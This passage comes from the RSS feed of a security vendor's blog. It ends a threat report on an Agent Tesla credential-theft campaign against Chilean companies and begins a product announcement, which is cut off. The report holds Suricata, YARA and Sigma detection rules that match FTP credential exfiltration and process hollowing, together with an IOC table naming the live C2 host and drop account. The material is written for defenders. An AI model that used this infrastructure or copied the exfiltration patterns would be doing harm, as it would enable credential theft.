margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Detection Recommendations</h3>



<h4 class="wp-block-heading">Network-Level (Suricata/Snort)</h4>



<pre class="wp-block-code"><code># Detect AgentTesla FTP exfiltration by filename pattern
alert tcp $HOME_NET any -&gt; $EXTERNAL_NET 21 (
  msg:"AgentTesla FTP Credential Exfil - PW_ prefix";
  flow:established,to_server;
  content:"STOR PW_"; depth:8;
  content:".html";
  sid:9000001; rev:1;
)
 
# Detect pre-exfil hosting check
alert http $HOME_NET any -&gt; $EXTERNAL_NET any (
  msg:"AgentTesla - ip-api hosting provider check";
  http.uri; content:"/line/?fields=hosting";
  sid:9000002; rev:1;
)</code></pre>



<h4 class="wp-block-heading">YARA Rule</h4>



<pre class="wp-block-code"><code>rule AgentTesla_ALTERNATE_Loader {
  meta:
    description = "Detects ALTERNATE.dll Agent Tesla loader (.NET Reactor 6.x)"
    author      = "0xOlympus"
    date        = "2026-03-27"
  strings:
    $pdb  = "ALTERNATE.pdb"  ascii
    $name = "ALTERNATE.dll"  ascii
    $aes  = "AesCryptoServiceProvider" wide
    $dec  = "CreateDecryptor"          wide
    $va   = "VirtualAlloc"   ascii
    $wpm  = "WriteProcessMemory" ascii
  condition:
    uint16(0) == 0x5A4D
    and all of ($pdb, $name)
    and all of ($aes, $dec)
    and any of ($va, $wpm)
}</code></pre>



<h4 class="wp-block-heading">Sigma Rule</h4>



<pre class="wp-block-code"><code>title: AgentTesla Process Hollowing via aspnet_compiler.exe
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: "\\powershell.exe"
    Image|endswith:       "\\aspnet_compiler.exe"
  filter_legit:
    CommandLine|contains:
      - "-f "
      - "-v "
  condition: selection and not filter_legit
falsepositives:
  - Legitimate .NET compilation tasks (rare outside dev environments)
level: high
tags:
  - attack.t1055.012
  - attack.t1059.001</code></pre>



<h4 class="wp-block-heading">Email Gateway Recommendations</h4>



<p>Block or quarantine emails containing attachments matching these patterns:</p>



<ul class="wp-block-list">
<li>Extensions .uu, .jse, .vbe inside archives;</li>



<li>Macro-enabled Office files (.xlam, .xlsm) from external senders in procurement contexts;</li>



<li>Filename patterns combining financial terms (orden, nomina, comprobante) with executable extensions. </li>
</ul>



<h3 class="wp-block-heading">Important Observations</h3>



<p>This investigation yields several actionable findings for security teams in Chile and the broader LATAM region:</p>



<h4 class="wp-block-heading">The campaign is persistent, not opportunistic</h4>



<p>The threat actor has operated continuously since at least mid-2024 using the same FTP infrastructure (89.39.83[.]184) while iterating on lure documents. This is a sustained operation with deliberate LATAM focus.</p>



<h4 class="wp-block-heading">Dynamic analysis is non-negotiable for this family</h4>



<p>.NET Reactor 6.x with virtualization and control flow obfuscation significantly raises the cost of static analysis. Organizations relying solely on static AV will miss this family. Dynamic analysis in sandboxes like ANY.RUN provides the detection coverage that static tools cannot.</p>



<h4 class="wp-block-heading">FTP exfiltration remains dangerously undermonitored</h4>



<p>Despite being a decades-old protocol, FTP exfiltration continues to succeed because most organizations focus monitoring on HTTP/S. Since FTP operates in cleartext, when it is captured, full credentials and data content are visible — but only if outbound FTP traffic is logged and inspected.</p>



<h4 class="wp-block-heading">Financial and procurement roles are high-value targets</h4>



<p>The consistent use of purchase order and payment receipt lures indicates deliberate targeting of accounts payable and procurement departments. Targeted security awareness training for these roles represents a high-ROI defensive investment.</p>



<h2 class="wp-block-heading">How ANY.RUN Accelerated This Investigation</h2>



<p>Several phases of this investigation would have been significantly slower or impossible without ANY.RUN. Here is where the platform made a direct impact:</p>



<h3 class="wp-block-heading">Interactive Detonation</h3>



<p>Unlike fully automated sandboxes, ANY.RUN’s interactive environment allowed real-time observation of the infection chain. This was critical for the .jse stage, which checks for user interaction before proceeding — a common evasion technique that automated systems fail to bypass.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="524" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-1024x524.png" alt="" class="wp-image-20947" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-1024x524.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-300x153.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-768x393.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-1536x785.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-370x189.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-270x138.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-585x300.png 585w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16-740x378.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image16.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Agent Tesla detonated in ANY.RUN Sandbox</figcaption></figure>



<h3 class="wp-block-heading">Automatic Network Threat Detection</h3>



<p>ANY.RUN matched 6 Suricata rules against the network traffic automatically, immediately confirming the Agent Tesla family and the FTP exfiltration behavior. In a traditional lab setup, this would require manual PCAP capture, Wireshark analysis, and custom rule development.</p>



<h3 class="wp-block-heading">Cleartext FTP Capture</h3>



<p>The cleartext FTP session — including the authentication handshake, the C2 hostname (ftp.horeca-bucuresti[.]ro), and the exfiltrated filename pattern — was captured in full by ANY.RUN’s network interception layer and presented directly in the Network tab, reducing analysis time from hours to minutes.</p>



<h3 class="wp-block-heading">Threat Intelligence Pivoting</h3>



<p>Using the C2 IP as a pivot point in ANY.RUN Threat Intelligence (combined with VirusTotal), we surfaced 80 related malicious samples, identified the 18-month campaign timeline, and mapped the full scope of LATAM targeting — transforming a single sample investigation into a comprehensive campaign report.</p>



<h2 class="wp-block-heading">Appendix: Complete IOC Reference</h2>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-329"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="14"
           data-wpID="329"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:57.505285412262%;                    padding:10px;
                    "
                    >
                                        				Indicator                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:13.213530655391%;                    padding:10px;
                    "
                    >
                                        				Type                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:29.281183932347%;                    padding:10px;
                    "
                    >
                                        				Description                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				948C8C69FE02EDA9231AEBFA5C626335307058AC74A5C3C40B346179A1BFC982                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				SHA256                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				RAR dropper                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				A7EEEAD9C868D9944ED1C1F113328F32                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				MD5                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				RAR dropper                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				B50B3800B17AD7AD5C4483C0B6B24D1D151A9D10                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				SHA1                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				RAR dropper                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				7929355856A2A85D48F95D230CD74FBB5AD554BED49E73B1800136C4BCCCD1A8                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				SHA256                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				.jse encoded dropper                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				CD83F5CEB2D014BADFA991106A9D37A6AEAB9043D60D796AD0F16D36CDFA5703                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				SHA256                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				PowerShell stager (all				variants)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				SHA256                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				PS stager template                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        89.39.83[.]184                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				IPv4                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				FTP C2 -				 MALICIOUS -  block immediately                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        ftp.horeca-bucuresti[.]ro                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        				FQDN                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        				FTP C2 hostname - 				MALICIOUS                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        208.95.112[.]1                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        				IPv4                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        				ip-api.com				(victim fingerprinting)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        americas2@horeca-bucuresti[.]ro                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        				FTP account                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        				Operator drop account                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        				C:\Temp\[A-Z]{8}.ps1                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        				Path regex                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        				Dropped stager pattern                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        				PW_[user]-[host]_[timestamp].html                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        				Filename pattern                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        				Exfil output format                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        				ALTERNATE.dll /				ALTERNATE.pdb                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        				Binary strings                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        				Internal loader identifiers                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-329'>
table#wpdtSimpleTable-329{ table-layout: fixed !important; }
table#wpdtSimpleTable-329 td, table.wpdtSimpleTable329 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000011 { font-size: 11px !important;}
</style>




<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;delivers cybersecurity solutions designed to support real-world SOC operations. They&nbsp;help&nbsp;security teams understand&nbsp;threats&nbsp;faster, make informed decisions,&nbsp;and&nbsp;operationalize threat intelligence across&nbsp;detection, investigation,&nbsp;and&nbsp;response&nbsp;workflows.&nbsp;</p>



<p>The&nbsp;company’s solutions include&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;for&nbsp;enterprise-grade malware analysis, as well as ANY.RUN’s Threat Intelligence with its modules&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds,</a>&nbsp;providing continuously updated intelligence based on live attack analysis.&nbsp;</p>



<p>Used by over 15,000 organizations&nbsp;and&nbsp;600,000 security professionals&nbsp;worldwide, ANY.RUN is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc_ready_reporting&amp;utm_term=130526&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified,</a>&nbsp;ensuring strong security controls&nbsp;and&nbsp;protection of customer data.&nbsp;</p>



<p><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noreferrer noopener">Request access to ANY.RUN’s solutions →</a>&nbsp;&nbsp;</p>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1778757638059"><strong class="schema-faq-question">Q1: What makes this Agent Tesla campaign different from others?</strong> <p class="schema-faq-answer">It uses a sophisticated .NET Reactor-protected loader with Process Hollowing and has operated persistently against LATAM targets for over 18 months using the same infrastructure.</p> </div> <div class="schema-faq-section" id="faq-question-1778757705785"><strong class="schema-faq-question">Why are Chilean companies specifically targeted?</strong> <p class="schema-faq-answer">Rapid digitalization, prevalent use of email for business documents, and relatively lower security maturity in SME supply chains.</p> </div> <div class="schema-faq-section" id="faq-question-1778757722383"><strong class="schema-faq-question">Can standard antivirus stop this attack?</strong> <p class="schema-faq-answer">Often not. The heavy obfuscation, fileless execution, and legitimate process injection frequently bypass static AV. Dynamic analysis is critical.</p> </div> <div class="schema-faq-section" id="faq-question-1778757735969"><strong class="schema-faq-question">What should employees do when receiving a suspicious purchase order?</strong> <p class="schema-faq-answer">Verify the sender through a separate channel and avoid opening attachments from unexpected sources.</p> </div> <div class="schema-faq-section" id="faq-question-1778757751911"><strong class="schema-faq-question">How can we detect the FTP exfiltration?</strong> <p class="schema-faq-answer">Monitor outbound FTP traffic (port 21) and look for filenames starting with “PW_” followed by username and hostname.</p> </div> <div class="schema-faq-section" id="faq-question-1778757758752"><strong class="schema-faq-question">How can ANY.RUN help my security team?</strong> <p class="schema-faq-answer">It provides interactive detonation, automatic threat detection, and intelligence pivoting that accelerate both analysis and proactive defense.</p> </div> </div>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/agent-tesla-latam-enterprise/">LATAM Under Siege: Agent Tesla&#8217;s 18-Month Credential Theft Campaign Against Chilean Enterprises</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/agent-tesla-latam-enterprise/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>New SOC-Ready Reporting for Faster Triage, Escalation, and Incident Response with ANY.RUN </title>
		<link>https://any.run/cybersecurity-blog/soc-ready-reporting/</link>
					<comments>https://any.run/cybersecurity-blog/soc-ready-reporting/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 13 May 2026 08:02:03 +0000</pubDate>
				<category><![CDATA[Service Updates]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20818</guid>

					<description><![CDATA[<p>Successful SOC operations&#160;require&#160;more than&#160;accurate&#160;detections.&#160;Instant access to context, clear conclusions,&#160;and&#160;operationally relevant insights allow incidents to move&#160;across&#160;workflows&#160;without delays:&#160; Making ANY.RUN’s Interactive Sandbox a part of your standard SOC workflow helps eliminate bottlenecks that occur along the incident lifecycle by contributing to the optimization of each process, decision, and report. SOC-ready Tier 1 reports turn&#160;complex sandboxing&#160;analysis into&#160;structured, decision-ready&#160;intelligence&#160;for&#160;faster, [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/soc-ready-reporting/">New SOC-Ready Reporting for Faster Triage, Escalation, and Incident Response with ANY.RUN </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Successful SOC operations&nbsp;require&nbsp;more than&nbsp;accurate&nbsp;<a href="https://any.run/cybersecurity-blog/streamline-your-soc/" target="_blank" rel="noreferrer noopener">detections</a>.&nbsp;Instant access to context, clear conclusions,&nbsp;and&nbsp;operationally relevant insights allow incidents to move&nbsp;across&nbsp;workflows&nbsp;without delays:&nbsp;</p>



<ul class="wp-block-list">
<li>During&nbsp;alert&nbsp;triage, analysts need a quick threat overview to decide on the next steps.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Efficient&nbsp;incident&nbsp;response decisions demand&nbsp;clear, actionable context to rely on.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Swift&nbsp;incident&nbsp;reporting&nbsp;requires&nbsp;cross-tier visibility without the need for manual processing of raw technical data.&nbsp;</li>
</ul>



<p>Making <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=soc_ready_reporting&amp;utm_term=130526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> a part of your standard SOC workflow helps eliminate bottlenecks that occur along the incident lifecycle by contributing to the optimization of each process, decision, and report.</p>



<p>SOC-ready Tier 1 reports turn&nbsp;complex sandboxing&nbsp;analysis into&nbsp;structured, decision-ready&nbsp;intelligence&nbsp;for&nbsp;faster, efficient&nbsp;triage, escalation, response,&nbsp;and&nbsp;reporting.&nbsp;</p>



<h2 class="wp-block-heading">Executive Summary&nbsp;</h2>



<ul class="wp-block-list">
<li>Whether&nbsp;operating&nbsp;as an internal SOC or delivering MDR&nbsp;and&nbsp;MSSP services, organizations need investigation&nbsp;workflows that scale efficiently under growing&nbsp;alert&nbsp;volumes.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>ANY.RUN’s Interactive Sandbox with Tier 1 Reports helps standardize&nbsp;triage, escalation,&nbsp;and&nbsp;incident&nbsp;reporting by becoming a decision-support layer for your security operations.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Enterprise Suite&nbsp;teams&nbsp;can&nbsp;optimize&nbsp;sandbox investigations&nbsp;and&nbsp;reporting across the SOC at scale with unlimited Tier 1 report generation.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The result is&nbsp;<a href="https://any.run/cybersecurity-blog/expanded-free-ti-plan/" target="_blank" rel="noreferrer noopener">faster&nbsp;investigations</a>,&nbsp;consistent&nbsp;escalations with less context lost,&nbsp;and&nbsp;optimized incident&nbsp;documentation for&nbsp;confident&nbsp;decisions&nbsp;and&nbsp;risk prioritization.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Challenges&nbsp;SOC Teams Face Today&nbsp;&nbsp;</h2>



<p>With SOC teams continuously investigating suspicious files, URLs,&nbsp;phishing pages,&nbsp;and&nbsp;malware samples, turning the resulting massive volume of technical findings into actionable operational context&nbsp;fast enough to support efficient&nbsp;response becomes the key challenge.&nbsp;</p>



<p>The lack of standardized reporting leads to:&nbsp;</p>



<ul class="wp-block-list">
<li>Slow&nbsp;triage due to&nbsp;excessive manual&nbsp;work&nbsp;for Tier 1&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Higher pressure on Tier 2/3&nbsp;and&nbsp;incident&nbsp;response team&nbsp;due to lack on ready-to-apply context&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Context loss during escalations&nbsp;and&nbsp;critical delays occur&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Additional&nbsp;burden falling on SOC managers without clear visibility into incident&nbsp;severity&nbsp;and&nbsp;<a href="https://any.run/cybersecurity-blog/soc-business-success-cases-anyrun/" target="_blank" rel="noreferrer noopener">business</a>&nbsp;impact&nbsp;</li>
</ul>



<p>ANY.RUN’s Interactive Sandbox already simplifies malware and <a href="https://any.run/cybersecurity-blog/phishing-detection-steps-for-cisos/" target="_blank" rel="noreferrer noopener">phishing analysis</a> through interactive, real-time investigation. Now, with Tier 1 Reports and AI Summary, it supports decision-making and reporting across SOC operations. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="541" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-1024x541.png" alt="" class="wp-image-20827" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-1024x541.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-768x406.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-1536x811.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-370x195.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-270x143.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-740x391.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing sample analysis in ANY.RUN Sandbox</em>&nbsp;</figcaption></figure></div>


<h2 class="wp-block-heading">SOC-Ready Reporting Built&nbsp;Into&nbsp;the&nbsp;Analysis&nbsp;Workflow&nbsp;</h2>



<p>New Tier 1 reports are&nbsp;integrated into SOC&nbsp;workflows&nbsp;through&nbsp;and&nbsp;offer&nbsp;complete, structured documents&nbsp;with operationally useful insights.&nbsp;</p>



<p>Tier 1&nbsp;report includes:&nbsp;&nbsp;&nbsp;</p>



<ul class="wp-block-list">
<li>A clear verdict on the analyzed sample&nbsp;&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>AI Summary&nbsp;featuring threat classification&nbsp;and&nbsp;executive summary&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Key IOCs&nbsp;and&nbsp;behavioral indicators&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/cybersecurity-blog/mitre-ciso-risk-reduction/" target="_blank" rel="noreferrer noopener">MITRE ATT&amp;CK</a>&nbsp;mapping&nbsp;</li>
</ul>



<figure class="wp-block-video"><video controls src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screen-Recording-2026-05-13-at-09.18.48.mov"></video></figure>



<p>They&nbsp;can be generated directly within the Interactive Sandbox in a single click, making sandbox analysis&nbsp;immediately&nbsp;usable across operational&nbsp;workflows.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Clarity for analysts. Visibility for decision-makers.<br>
